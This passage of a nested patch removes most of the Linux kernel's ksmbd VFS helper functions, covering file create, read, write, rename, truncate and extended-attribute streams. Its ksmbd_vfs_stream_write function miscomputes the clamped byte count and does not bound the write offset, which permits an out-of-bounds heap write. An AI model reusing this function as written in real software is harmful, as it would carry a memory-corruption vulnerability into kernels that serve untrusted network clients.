+-int ksmbd_vfs_may_delete(struct user_namespace *user_ns,
+-			 struct dentry *dentry)
+-{
+-	struct dentry *parent;
+-	int ret;
+-
+-	parent = dget_parent(dentry);
+-	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
+-	if (ret) {
+-		dput(parent);
+-		return ret;
+-	}
+-
+-	ret = inode_permission(user_ns, d_inode(parent),
+-			       MAY_EXEC | MAY_WRITE);
+-
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-	return ret;
+-}
+-
+-int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
+-				   struct dentry *dentry, __le32 *daccess)
+-{
+-	struct dentry *parent;
+-	int ret = 0;
+-
+-	*daccess = cpu_to_le32(FILE_READ_ATTRIBUTES | READ_CONTROL);
+-
+-	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_WRITE))
+-		*daccess |= cpu_to_le32(WRITE_DAC | WRITE_OWNER | SYNCHRONIZE |
+-				FILE_WRITE_DATA | FILE_APPEND_DATA |
+-				FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES |
+-				FILE_DELETE_CHILD);
+-
+-	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_READ))
+-		*daccess |= FILE_READ_DATA_LE | FILE_READ_EA_LE;
+-
+-	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_EXEC))
+-		*daccess |= FILE_EXECUTE_LE;
+-
+-	parent = dget_parent(dentry);
+-	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
+-	if (ret) {
+-		dput(parent);
+-		return ret;
+-	}
+-
+-	if (!inode_permission(user_ns, d_inode(parent), MAY_EXEC | MAY_WRITE))
+-		*daccess |= FILE_DELETE_LE;
+-
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-	return ret;
+-}
+-
+-/**
+- * ksmbd_vfs_create() - vfs helper for smb create file
+- * @work:	work
+- * @name:	file name that is relative to share
+- * @mode:	file create mode
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_create(struct ksmbd_work *work, const char *name, umode_t mode)
+-{
+-	struct path path;
+-	struct dentry *dentry;
+-	int err;
+-
+-	dentry = ksmbd_vfs_kern_path_create(work, name,
+-					    LOOKUP_NO_SYMLINKS, &path);
+-	if (IS_ERR(dentry)) {
+-		err = PTR_ERR(dentry);
+-		if (err != -ENOENT)
+-			pr_err("path create failed for %s, err %d\n",
+-			       name, err);
+-		return err;
+-	}
+-
+-	mode |= S_IFREG;
+-	err = vfs_create(mnt_user_ns(path.mnt), d_inode(path.dentry),
+-			 dentry, mode, true);
+-	if (!err) {
+-		ksmbd_vfs_inherit_owner(work, d_inode(path.dentry),
+-					d_inode(dentry));
+-	} else {
+-		pr_err("File(%s): creation failed (err:%d)\n", name, err);
+-	}
+-	done_path_create(&path, dentry);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_mkdir() - vfs helper for smb create directory
+- * @work:	work
+- * @name:	directory name that is relative to share
+- * @mode:	directory create mode
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_mkdir(struct ksmbd_work *work, const char *name, umode_t mode)
+-{
+-	struct user_namespace *user_ns;
+-	struct path path;
+-	struct dentry *dentry;
+-	int err;
+-
+-	dentry = ksmbd_vfs_kern_path_create(work, name,
+-					    LOOKUP_NO_SYMLINKS | LOOKUP_DIRECTORY,
+-					    &path);
+-	if (IS_ERR(dentry)) {
+-		err = PTR_ERR(dentry);
+-		if (err != -EEXIST)
+-			ksmbd_debug(VFS, "path create failed for %s, err %d\n",
+-				    name, err);
+-		return err;
+-	}
+-
+-	user_ns = mnt_user_ns(path.mnt);
+-	mode |= S_IFDIR;
+-	err = vfs_mkdir(user_ns, d_inode(path.dentry), dentry, mode);
+-	if (err) {
+-		goto out;
+-	} else if (d_unhashed(dentry)) {
+-		struct dentry *d;
+-
+-		d = lookup_one(user_ns, dentry->d_name.name, dentry->d_parent,
+-			       dentry->d_name.len);
+-		if (IS_ERR(d)) {
+-			err = PTR_ERR(d);
+-			goto out;
+-		}
+-		if (unlikely(d_is_negative(d))) {
+-			dput(d);
+-			err = -ENOENT;
+-			goto out;
+-		}
+-
+-		ksmbd_vfs_inherit_owner(work, d_inode(path.dentry), d_inode(d));
+-		dput(d);
+-	}
+-out:
+-	done_path_create(&path, dentry);
+-	if (err)
+-		pr_err("mkdir(%s): creation failed (err:%d)\n", name, err);
+-	return err;
+-}
+-
+-static ssize_t ksmbd_vfs_getcasexattr(struct user_namespace *user_ns,
+-				      struct dentry *dentry, char *attr_name,
+-				      int attr_name_len, char **attr_value)
+-{
+-	char *name, *xattr_list = NULL;
+-	ssize_t value_len = -ENOENT, xattr_list_len;
+-
+-	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
+-	if (xattr_list_len <= 0)
+-		goto out;
+-
+-	for (name = xattr_list; name - xattr_list < xattr_list_len;
+-			name += strlen(name) + 1) {
+-		ksmbd_debug(VFS, "%s, len %zd\n", name, strlen(name));
+-		if (strncasecmp(attr_name, name, attr_name_len))
+-			continue;
+-
+-		value_len = ksmbd_vfs_getxattr(user_ns,
+-					       dentry,
+-					       name,
+-					       attr_value);
+-		if (value_len < 0)
+-			pr_err("failed to get xattr in file\n");
+-		break;
+-	}
+-
+-out:
+-	kvfree(xattr_list);
+-	return value_len;
+-}
+-
+-static int ksmbd_vfs_stream_read(struct ksmbd_file *fp, char *buf, loff_t *pos,
+-				 size_t count)
+-{
+-	ssize_t v_len;
+-	char *stream_buf = NULL;
+-
+-	ksmbd_debug(VFS, "read stream data pos : %llu, count : %zd\n",
+-		    *pos, count);
+-
+-	v_len = ksmbd_vfs_getcasexattr(file_mnt_user_ns(fp->filp),
+-				       fp->filp->f_path.dentry,
+-				       fp->stream.name,
+-				       fp->stream.size,
+-				       &stream_buf);
+-	if ((int)v_len <= 0)
+-		return (int)v_len;
+-
+-	if (v_len <= *pos) {
+-		count = -EINVAL;
+-		goto free_buf;
+-	}
+-
+-	if (v_len - *pos < count)
+-		count = v_len - *pos;
+-
+-	memcpy(buf, &stream_buf[*pos], count);
+-
+-free_buf:
+-	kvfree(stream_buf);
+-	return count;
+-}
+-
+-/**
+- * check_lock_range() - vfs helper for smb byte range file locking
+- * @filp:	the file to apply the lock to
+- * @start:	lock start byte offset
+- * @end:	lock end byte offset
+- * @type:	byte range type read/write
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int check_lock_range(struct file *filp, loff_t start, loff_t end,
+-			    unsigned char type)
+-{
+-	struct file_lock *flock;
+-	struct file_lock_context *ctx = file_inode(filp)->i_flctx;
+-	int error = 0;
+-
+-	if (!ctx || list_empty_careful(&ctx->flc_posix))
+-		return 0;
+-
+-	spin_lock(&ctx->flc_lock);
+-	list_for_each_entry(flock, &ctx->flc_posix, fl_list) {
+-		/* check conflict locks */
+-		if (flock->fl_end >= start && end >= flock->fl_start) {
+-			if (flock->fl_type == F_RDLCK) {
+-				if (type == WRITE) {
+-					pr_err("not allow write by shared lock\n");
+-					error = 1;
+-					goto out;
+-				}
+-			} else if (flock->fl_type == F_WRLCK) {
+-				/* check owner in lock */
+-				if (flock->fl_file != filp) {
+-					error = 1;
+-					pr_err("not allow rw access by exclusive lock from other opens\n");
+-					goto out;
+-				}
+-			}
+-		}
+-	}
+-out:
+-	spin_unlock(&ctx->flc_lock);
+-	return error;
+-}
+-
+-/**
+- * ksmbd_vfs_read() - vfs helper for smb file read
+- * @work:	smb work
+- * @fid:	file id of open file
+- * @count:	read byte count
+- * @pos:	file pos
+- *
+- * Return:	number of read bytes on success, otherwise error
+- */
+-int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp, size_t count,
+-		   loff_t *pos)
+-{
+-	struct file *filp = fp->filp;
+-	ssize_t nbytes = 0;
+-	char *rbuf = work->aux_payload_buf;
+-	struct inode *inode = file_inode(filp);
+-
+-	if (S_ISDIR(inode->i_mode))
+-		return -EISDIR;
+-
+-	if (unlikely(count == 0))
+-		return 0;
+-
+-	if (work->conn->connection_type) {
+-		if (!(fp->daccess & (FILE_READ_DATA_LE | FILE_EXECUTE_LE))) {
+-			pr_err("no right to read(%pD)\n", fp->filp);
+-			return -EACCES;
+-		}
+-	}
+-
+-	if (ksmbd_stream_fd(fp))
+-		return ksmbd_vfs_stream_read(fp, rbuf, pos, count);
+-
+-	if (!work->tcon->posix_extensions) {
+-		int ret;
+-
+-		ret = check_lock_range(filp, *pos, *pos + count - 1, READ);
+-		if (ret) {
+-			pr_err("unable to read due to lock\n");
+-			return -EAGAIN;
+-		}
+-	}
+-
+-	nbytes = kernel_read(filp, rbuf, count, pos);
+-	if (nbytes < 0) {
+-		pr_err("smb read failed, err = %zd\n", nbytes);
+-		return nbytes;
+-	}
+-
+-	filp->f_pos = *pos;
+-	return nbytes;
+-}
+-
+-static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
+-				  size_t count)
+-{
+-	char *stream_buf = NULL, *wbuf;
+-	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
+-	size_t size, v_len;
+-	int err = 0;
+-
+-	ksmbd_debug(VFS, "write stream data pos : %llu, count : %zd\n",
+-		    *pos, count);
+-
+-	size = *pos + count;
+-	if (size > XATTR_SIZE_MAX) {
+-		size = XATTR_SIZE_MAX;
+-		count = (*pos + count) - XATTR_SIZE_MAX;
+-	}
+-
+-	v_len = ksmbd_vfs_getcasexattr(user_ns,
+-				       fp->filp->f_path.dentry,
+-				       fp->stream.name,
+-				       fp->stream.size,
+-				       &stream_buf);
+-	if ((int)v_len < 0) {
+-		pr_err("not found stream in xattr : %zd\n", v_len);
+-		err = (int)v_len;
+-		goto out;
+-	}
+-
+-	if (v_len < size) {
+-		wbuf = kvmalloc(size, GFP_KERNEL | __GFP_ZERO);
+-		if (!wbuf) {
+-			err = -ENOMEM;
+-			goto out;
+-		}
+-
+-		if (v_len > 0)
+-			memcpy(wbuf, stream_buf, v_len);
+-		kvfree(stream_buf);
+-		stream_buf = wbuf;
+-	}
+-
+-	memcpy(&stream_buf[*pos], buf, count);
+-
+-	err = ksmbd_vfs_setxattr(user_ns,
+-				 fp->filp->f_path.dentry,
+-				 fp->stream.name,
+-				 (void *)stream_buf,
+-				 size,
+-				 0);
+-	if (err < 0)
+-		goto out;
+-
+-	fp->filp->f_pos = *pos;
+-	err = 0;
+-out:
+-	kvfree(stream_buf);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_write() - vfs helper for smb file write
+- * @work:	work
+- * @fid:	file id of open file
+- * @buf:	buf containing data for writing
+- * @count:	read byte count
+- * @pos:	file pos
+- * @sync:	fsync after write
+- * @written:	number of bytes written
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_write(struct ksmbd_work *work, struct ksmbd_file *fp,
+-		    char *buf, size_t count, loff_t *pos, bool sync,
+-		    ssize_t *written)
+-{
+-	struct file *filp;
+-	loff_t	offset = *pos;
+-	int err = 0;
+-
+-	if (work->conn->connection_type) {
+-		if (!(fp->daccess & FILE_WRITE_DATA_LE)) {
+-			pr_err("no right to write(%pD)\n", fp->filp);
+-			err = -EACCES;
+-			goto out;
+-		}
+-	}
+-
+-	filp = fp->filp;
+-
+-	if (ksmbd_stream_fd(fp)) {
+-		err = ksmbd_vfs_stream_write(fp, buf, pos, count);
+-		if (!err)
+-			*written = count;
+-		goto out;
+-	}
+-
+-	if (!work->tcon->posix_extensions) {
+-		err = check_lock_range(filp, *pos, *pos + count - 1, WRITE);
+-		if (err) {
+-			pr_err("unable to write due to lock\n");
+-			err = -EAGAIN;
+-			goto out;
+-		}
+-	}
+-
+-	/* Do we need to break any of a levelII oplock? */
+-	smb_break_all_levII_oplock(work, fp, 1);
+-
+-	err = kernel_write(filp, buf, count, pos);
+-	if (err < 0) {
+-		ksmbd_debug(VFS, "smb write failed, err = %d\n", err);
+-		goto out;
+-	}
+-
+-	filp->f_pos = *pos;
+-	*written = err;
+-	err = 0;
+-	if (sync) {
+-		err = vfs_fsync_range(filp, offset, offset + *written, 0);
+-		if (err < 0)
+-			pr_err("fsync failed for filename = %pD, err = %d\n",
+-			       fp->filp, err);
+-	}
+-
+-out:
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_getattr() - vfs helper for smb getattr
+- * @work:	work
+- * @fid:	file id of open file
+- * @attrs:	inode attributes
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_getattr(const struct path *path, struct kstat *stat)
+-{
+-	int err;
+-
+-	err = vfs_getattr(path, stat, STATX_BTIME, AT_STATX_SYNC_AS_STAT);
+-	if (err)
+-		pr_err("getattr failed, err %d\n", err);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_fsync() - vfs helper for smb fsync
+- * @work:	work
+- * @fid:	file id of open file
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_fsync(struct ksmbd_work *work, u64 fid, u64 p_id)
+-{
+-	struct ksmbd_file *fp;
+-	int err;
+-
+-	fp = ksmbd_lookup_fd_slow(work, fid, p_id);
+-	if (!fp) {
+-		pr_err("failed to get filp for fid %llu\n", fid);
+-		return -ENOENT;
+-	}
+-	err = vfs_fsync(fp->filp, 0);
+-	if (err < 0)
+-		pr_err("smb fsync failed, err = %d\n", err);
+-	ksmbd_fd_put(work, fp);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_remove_file() - vfs helper for smb rmdir or unlink
+- * @name:	directory or file name that is relative to share
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_remove_file(struct ksmbd_work *work, char *name)
+-{
+-	struct user_namespace *user_ns;
+-	struct path path;
+-	struct dentry *parent;
+-	int err;
+-
+-	if (ksmbd_override_fsids(work))
+-		return -ENOMEM;
+-
+-	err = ksmbd_vfs_kern_path(work, name, LOOKUP_NO_SYMLINKS, &path, false);
+-	if (err) {
+-		ksmbd_debug(VFS, "can't get %s, err %d\n", name, err);
+-		ksmbd_revert_fsids(work);
+-		return err;
+-	}
+-
+-	user_ns = mnt_user_ns(path.mnt);
+-	parent = dget_parent(path.dentry);
+-	err = ksmbd_vfs_lock_parent(user_ns, parent, path.dentry);
+-	if (err) {
+-		dput(parent);
+-		path_put(&path);
+-		ksmbd_revert_fsids(work);
+-		return err;
+-	}
+-
+-	if (!d_inode(path.dentry)->i_nlink) {
+-		err = -ENOENT;
+-		goto out_err;
+-	}
+-
+-	if (S_ISDIR(d_inode(path.dentry)->i_mode)) {
+-		err = vfs_rmdir(user_ns, d_inode(parent), path.dentry);
+-		if (err && err != -ENOTEMPTY)
+-			ksmbd_debug(VFS, "%s: rmdir failed, err %d\n", name,
+-				    err);
+-	} else {
+-		err = vfs_unlink(user_ns, d_inode(parent), path.dentry, NULL);
+-		if (err)
+-			ksmbd_debug(VFS, "%s: unlink failed, err %d\n", name,
+-				    err);
+-	}
+-
+-out_err:
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-	path_put(&path);
+-	ksmbd_revert_fsids(work);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_link() - vfs helper for creating smb hardlink
+- * @oldname:	source file name
+- * @newname:	hardlink name that is relative to share
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_link(struct ksmbd_work *work, const char *oldname,
+-		   const char *newname)
+-{
+-	struct path oldpath, newpath;
+-	struct dentry *dentry;
+-	int err;
+-
+-	if (ksmbd_override_fsids(work))
+-		return -ENOMEM;
+-
+-	err = kern_path(oldname, LOOKUP_NO_SYMLINKS, &oldpath);
+-	if (err) {
+-		pr_err("cannot get linux path for %s, err = %d\n",
+-		       oldname, err);
+-		goto out1;
+-	}
+-
+-	dentry = ksmbd_vfs_kern_path_create(work, newname,
+-					    LOOKUP_NO_SYMLINKS | LOOKUP_REVAL,
+-					    &newpath);
+-	if (IS_ERR(dentry)) {
+-		err = PTR_ERR(dentry);
+-		pr_err("path create err for %s, err %d\n", newname, err);
+-		goto out2;
+-	}
+-
+-	err = -EXDEV;
+-	if (oldpath.mnt != newpath.mnt) {
+-		pr_err("vfs_link failed err %d\n", err);
+-		goto out3;
+-	}
+-
+-	err = vfs_link(oldpath.dentry, mnt_user_ns(newpath.mnt),
+-		       d_inode(newpath.dentry),
+-		       dentry, NULL);
+-	if (err)
+-		ksmbd_debug(VFS, "vfs_link failed err %d\n", err);
+-
+-out3:
+-	done_path_create(&newpath, dentry);
+-out2:
+-	path_put(&oldpath);
+-out1:
+-	ksmbd_revert_fsids(work);
+-	return err;
+-}
+-
+-static int ksmbd_validate_entry_in_use(struct dentry *src_dent)
+-{
+-	struct dentry *dst_dent;
+-
+-	spin_lock(&src_dent->d_lock);
+-	list_for_each_entry(dst_dent, &src_dent->d_subdirs, d_child) {
+-		struct ksmbd_file *child_fp;
+-
+-		if (d_really_is_negative(dst_dent))
+-			continue;
+-
+-		child_fp = ksmbd_lookup_fd_inode(d_inode(dst_dent));
+-		if (child_fp) {
+-			spin_unlock(&src_dent->d_lock);
+-			ksmbd_debug(VFS, "Forbid rename, sub file/dir is in use\n");
+-			return -EACCES;
+-		}
+-	}
+-	spin_unlock(&src_dent->d_lock);
+-
+-	return 0;
+-}
+-
+-static int __ksmbd_vfs_rename(struct ksmbd_work *work,
+-			      struct user_namespace *src_user_ns,
+-			      struct dentry *src_dent_parent,
+-			      struct dentry *src_dent,
+-			      struct user_namespace *dst_user_ns,
+-			      struct dentry *dst_dent_parent,
+-			      struct dentry *trap_dent,
+-			      char *dst_name)
+-{
+-	struct dentry *dst_dent;
+-	int err;
+-
+-	if (!work->tcon->posix_extensions) {
+-		err = ksmbd_validate_entry_in_use(src_dent);
+-		if (err)
+-			return err;
+-	}
+-
+-	if (d_really_is_negative(src_dent_parent))
+-		return -ENOENT;
+-	if (d_really_is_negative(dst_dent_parent))
+-		return -ENOENT;
+-	if (d_really_is_negative(src_dent))
+-		return -ENOENT;
+-	if (src_dent == trap_dent)
+-		return -EINVAL;
+-
+-	if (ksmbd_override_fsids(work))
+-		return -ENOMEM;
+-
+-	dst_dent = lookup_one(dst_user_ns, dst_name, dst_dent_parent,
+-			      strlen(dst_name));
+-	err = PTR_ERR(dst_dent);
+-	if (IS_ERR(dst_dent)) {
+-		pr_err("lookup failed %s [%d]\n", dst_name, err);
+-		goto out;
+-	}
+-
+-	err = -ENOTEMPTY;
+-	if (dst_dent != trap_dent && !d_really_is_positive(dst_dent)) {
+-		struct renamedata rd = {
+-			.old_mnt_userns	= src_user_ns,
+-			.old_dir	= d_inode(src_dent_parent),
+-			.old_dentry	= src_dent,
+-			.new_mnt_userns	= dst_user_ns,
+-			.new_dir	= d_inode(dst_dent_parent),
+-			.new_dentry	= dst_dent,
+-		};
+-		err = vfs_rename(&rd);
+-	}
+-	if (err)
+-		pr_err("vfs_rename failed err %d\n", err);
+-	if (dst_dent)
+-		dput(dst_dent);
+-out:
+-	ksmbd_revert_fsids(work);
+-	return err;
+-}
+-
+-int ksmbd_vfs_fp_rename(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			char *newname)
+-{
+-	struct user_namespace *user_ns;
+-	struct path dst_path;
+-	struct dentry *src_dent_parent, *dst_dent_parent;
+-	struct dentry *src_dent, *trap_dent, *src_child;
+-	char *dst_name;
+-	int err;
+-
+-	dst_name = extract_last_component(newname);
+-	if (!dst_name) {
+-		dst_name = newname;
+-		newname = "";
+-	}
+-
+-	src_dent_parent = dget_parent(fp->filp->f_path.dentry);
+-	src_dent = fp->filp->f_path.dentry;
+-
+-	err = ksmbd_vfs_kern_path(work, newname,
+-				  LOOKUP_NO_SYMLINKS | LOOKUP_DIRECTORY,
+-				  &dst_path, false);
+-	if (err) {
+-		ksmbd_debug(VFS, "Cannot get path for %s [%d]\n", newname, err);
+-		goto out;
+-	}
+-	dst_dent_parent = dst_path.dentry;
+-
+-	trap_dent = lock_rename(src_dent_parent, dst_dent_parent);
+-	dget(src_dent);
+-	dget(dst_dent_parent);
+-	user_ns = file_mnt_user_ns(fp->filp);
+-	src_child = lookup_one(user_ns, src_dent->d_name.name, src_dent_parent,
+-			       src_dent->d_name.len);
+-	if (IS_ERR(src_child)) {
+-		err = PTR_ERR(src_child);
+-		goto out_lock;
+-	}
+-
+-	if (src_child != src_dent) {
+-		err = -ESTALE;
+-		dput(src_child);
+-		goto out_lock;
+-	}
+-	dput(src_child);
+-
+-	err = __ksmbd_vfs_rename(work,
+-				 user_ns,
+-				 src_dent_parent,
+-				 src_dent,
+-				 mnt_user_ns(dst_path.mnt),
+-				 dst_dent_parent,
+-				 trap_dent,
+-				 dst_name);
+-out_lock:
+-	dput(src_dent);
+-	dput(dst_dent_parent);
+-	unlock_rename(src_dent_parent, dst_dent_parent);
+-	path_put(&dst_path);
+-out:
+-	dput(src_dent_parent);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_truncate() - vfs helper for smb file truncate
+- * @work:	work
+- * @fid:	file id of old file
+- * @size:	truncate to given size
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_truncate(struct ksmbd_work *work,
+-		       struct ksmbd_file *fp, loff_t size)
+-{
+-	int err = 0;
+-	struct file *filp;
+-
+-	filp = fp->filp;
+-
+-	/* Do we need to break any of a levelII oplock? */
+-	smb_break_all_levII_oplock(work, fp, 1);
+-
+-	if (!work->tcon->posix_extensions) {
+-		struct inode *inode = file_inode(filp);
+-
+-		if (size < inode->i_size) {
+-			err = check_lock_range(filp, size,
+-					       inode->i_size - 1, WRITE);
+-		} else {
+-			err = check_lock_range(filp, inode->i_size,
+-					       size - 1, WRITE);
+-		}
+-
+-		if (err) {
+-			pr_err("failed due to lock\n");
+-			return -EAGAIN;
+-		}
+-	}
+-
+-	err = vfs_truncate(&filp->f_path, size);
+-	if (err)
+-		pr_err("truncate failed, err %d\n", err);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_listxattr() - vfs helper for smb list extended attributes
+- * @dentry:	dentry of file for listing xattrs
+- * @list:	destination buffer
+- * @size:	destination buffer length
+- *
+- * Return:	xattr list length on success, otherwise error
+- */
+-ssize_t ksmbd_vfs_listxattr(struct dentry *dentry, char **list)
+-{
+-	ssize_t size;
+-	char *vlist = NULL;
+-
+-	size = vfs_listxattr(dentry, NULL, 0);
+-	if (size <= 0)
+-		return size;
+-
+-	vlist = kvmalloc(size, GFP_KERNEL | __GFP_ZERO);
+-	if (!vlist)
+-		return -ENOMEM;
+-
+-	*list = vlist;
+-	size = vfs_listxattr(dentry, vlist, size);
+-	if (size < 0) {
+-		ksmbd_debug(VFS, "listxattr failed\n");
+-		kvfree(vlist);
+-		*list = NULL;
+-	}
+-
+-	return size;
+-}
+-
+-static ssize_t ksmbd_vfs_xattr_len(struct user_namespace *user_ns,
+-				   struct dentry *dentry, char *xattr_name)
+-{
+-	return vfs_getxattr(user_ns, dentry, xattr_name, NULL, 0);
+-}
+-
+-/**
+- * ksmbd_vfs_getxattr() - vfs helper for smb get extended attributes value
+- * @user_ns:	user namespace
+- * @dentry:	dentry of file for getting xattrs
+- * @xattr_name:	name of xattr name to query
+- * @xattr_buf:	destination buffer xattr value
+- *
+- * Return:	read xattr value length on success, otherwise error
+- */
+-ssize_t ksmbd_vfs_getxattr(struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   char *xattr_name, char **xattr_buf)
+-{
+-	ssize_t xattr_len;
+-	char *buf;
+-
+-	*xattr_buf = NULL;
+-	xattr_len = ksmbd_vfs_xattr_len(user_ns, dentry, xattr_name);
+-	if (xattr_len < 0)
+-		return xattr_len;
+-
+-	buf = kmalloc(xattr_len + 1, GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	xattr_len = vfs_getxattr(user_ns, dentry, xattr_name,
+-				 (void *)buf, xattr_len);
+-	if (xattr_len > 0)
+-		*xattr_buf = buf;
+-	else
+-		kfree(buf);
+-	return xattr_len;
+-}
+-
+-/**
+- * ksmbd_vfs_setxattr() - vfs helper for smb set extended attributes value
+- * @user_ns:	user namespace
+- * @dentry:	dentry to set XATTR at
+- * @name:	xattr name for setxattr
+- * @value:	xattr value to set
+- * @size:	size of xattr value
+- * @flags:	destination buffer length
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_setxattr(struct user_namespace *user_ns,
+-		       struct dentry *dentry, const char *attr_name,
+-		       void *attr_value, size_t attr_size, int flags)
+-{
+-	int err;
+-
+-	err = vfs_setxattr(user_ns,
+-			   dentry,
+-			   attr_name,
+-			   attr_value,
+-			   attr_size,
+-			   flags);
+-	if (err)
+-		ksmbd_debug(VFS, "setxattr failed, err %d\n", err);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_set_fadvise() - convert smb IO caching options to linux options
+- * @filp:	file pointer for IO
+- * @options:	smb IO options
+- */
+-void ksmbd_vfs_set_fadvise(struct file *filp, __le32 option)
+-{
+-	struct address_space *mapping;
+-
+-	mapping = filp->f_mapping;
+-
+-	if (!option || !mapping)
+-		return;
+-
+-	if (option & FILE_WRITE_THROUGH_LE) {
+-		filp->f_flags |= O_SYNC;
+-	} else if (option & FILE_SEQUENTIAL_ONLY_LE) {
+-		filp->f_ra.ra_pages = inode_to_bdi(mapping->host)->ra_pages * 2;
+-		spin_lock(&filp->f_lock);
+-		filp->f_mode &= ~FMODE_RANDOM;
+-		spin_unlock(&filp->f_lock);
+-	} else if (option & FILE_RANDOM_ACCESS_LE) {
+-		spin_lock(&filp->f_lock);
+-		filp->f_mode |= FMODE_RANDOM;
+-		spin_unlock(&filp->f_lock);
+-	}
+-}
+-
+-int ksmbd_vfs_zero_data(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			loff_t off, loff_t len)
+-{
+-	smb_break_all_levII_oplock(work, fp, 1);
+-	if (fp->f_ci->m_fattr & FILE_ATTRIBUTE_SPARSE_FILE_LE)
+-		return vfs_fallocate(fp->filp,
+-				     FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
+-				     off, len);
+-
+-	return vfs_fallocate(fp->filp,
+-			     FALLOC_FL_ZERO_RANGE | FALLOC_FL_KEEP_SIZE,
+-			     off, len);
+-}
+-
+-int ksmbd_vfs_fqar_lseek(struct ksmbd_file *fp, loff_t start, loff_t length,
+-			 struct file_allocated_range_buffer *ranges,
+-			 unsigned int in_count, unsigned int *out_count)
+-{
+-	struct file *f = fp->filp;
+-	struct inode *inode = file_inode(fp->filp);
+-	loff_t maxbytes = (u64)inode->i_sb->s_maxbytes, end;
+-	loff_t extent_start, extent_end;
+-	int ret = 0;
+-
+-	if (start > maxbytes)
+-		return -EFBIG;
+-
+-	if (!in_count)
+-		return 0;
+-
+-	/*
+-	 * Shrink request scope to what the fs can actually handle.
+-	 */
+-	if (length > maxbytes || (maxbytes - length) < start)
+-		length = maxbytes - start;
+-
+-	if (start + length > inode->i_size)
+-		length = inode->i_size - start;
+-
+-	*out_count = 0;
+-	end = start + length;
+-	while (start < end && *out_count < in_count) {
+-		extent_start = vfs_llseek(f, start, SEEK_DATA);
+-		if (extent_start < 0) {
+-			if (extent_start != -ENXIO)
+-				ret = (int)extent_start;
+-			break;
+-		}
+-
+-		if (extent_start >= end)
+-			break;
+-
+-		extent_end = vfs_llseek(f, extent_start, SEEK_HOLE);
+-		if (extent_end < 0) {
+-			if (extent_end != -ENXIO)
+-				ret = (int)extent_end;
+-			break;
+-		} else if (extent_start >= extent_end) {
+-			break;
+-		}
+-
+-		ranges[*out_count].file_offset = cpu_to_le64(extent_start);
+-		ranges[(*out_count)++].length =
+-			cpu_to_le64(min(extent_end, end) - extent_start);
+-
+-		start = extent_end;
+-	}
+-
+-	return ret;
+-}
+-
+-int ksmbd_vfs_remove_xattr(struct user_namespace *user_ns,
+-			   struct dentry *dentry, char *attr_name)
+-{
+-	return vfs_removexattr(user_ns, dentry, attr_name);
+-}
+-
+-int ksmbd_vfs_unlink(struct user_namespace *user_ns,
+-		     struct dentry *dir, struct dentry *dentry)
+-{
+-	int err = 0;
+-
+-	err = ksmbd_vfs_lock_parent(user_ns, dir, dentry);
+-	if (err)
+-		return err;
+-	dget(dentry);
+-
+-	if (S_ISDIR(d_inode(dentry)->i_mode))
+-		err = vfs_rmdir(user_ns, d_inode(dir), dentry);
+-	else
+-		err = vfs_unlink(user_ns, d_inode(dir), dentry, NULL);
+-
+-	dput(dentry);
+-	inode_unlock(d_inode(dir));
+-	if (err)
+-		ksmbd_debug(VFS, "failed to delete, err %d\n", err);
+-
+-	return err;
+-}
+-
+-static bool __dir_empty(struct dir_context *ctx, const char *name, int namlen,
+-		       loff_t offset, u64 ino, unsigned int d_type)
+-{
+-	struct ksmbd_readdir_data *buf;
+-
+-	buf = container_of(ctx, struct ksmbd_readdir_data, ctx);
+-	buf->dirent_count++;
+-
+-	return buf->dirent_count <= 2;
+-}
+-
+-/**
+- * ksmbd_vfs_empty_dir() - check for empty directory
+- * @fp:	ksmbd file pointer
+- *
+- * Return:	true if directory empty, otherwise false
+- */
+-int ksmbd_vfs_empty_dir(struct ksmbd_file *fp)
+-{
+-	int err;
+-	struct ksmbd_readdir_data readdir_data;
+-
+-	memset(&readdir_data, 0, sizeof(struct ksmbd_readdir_data));
+-
+-	set_ctx_actor(&readdir_data.ctx, __dir_empty);
+-	readdir_data.dirent_count = 0;
+-
+-	err = iterate_dir(fp->filp, &readdir_data.ctx);
+-	if (readdir_data.dirent_count > 2)
+-		err = -ENOTEMPTY;
+-	else
+-		err = 0;
+-	return err;
+-}
+-
+-static bool __caseless_lookup(struct dir_context *ctx, const char *name,
+-			     int namlen, loff_t offset, u64 ino,
+-			     unsigned int d_type)
+-{
